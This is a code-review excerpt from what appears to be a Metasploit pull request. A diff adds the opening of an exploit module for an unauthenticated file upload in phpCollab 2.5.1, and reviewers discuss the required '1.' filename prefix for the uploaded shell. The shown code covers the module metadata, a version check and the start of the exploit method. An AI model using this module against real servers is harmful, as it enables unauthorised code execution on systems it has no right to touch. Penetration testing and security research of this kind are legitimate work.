modules/exploits/unix/webapp/phpcollab_upload_exec.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload',
+      'Description'    => %q{
+          This module exploits a file upload vulnerability in phpCollab 2.5.1
+        which could be abused to allow unauthenticated users to execute arbitrary code
+        under the context of the web server user.
+
+        The exploit has been tested on Ubuntu 16.04.3 64-bit
+      },
+      'Author'         =>
+        [
+          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
+          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '42934' ],
+          [ 'URL', 'http://www.phpcollab.com/' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 29 2017'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
+        ])
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
+    res = send_request_cgi(
+        'method'  => 'GET',
+        'uri'     =>  url
+    )
+
+    if res && res.body.include?('PhpCollab v2.5.1')
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
```

Comment:
Does it have to be `1.` ? Can this be randomized ?

Reply:
According to the author from a different reply:

> I am a total newbie, and appreciate your help. I started with a randomized filename in the beginning, but I found out using burp suite that the shell file is named after the "id" parameter in the post url. The "id" parameter has to be set to "1" for the upload to work.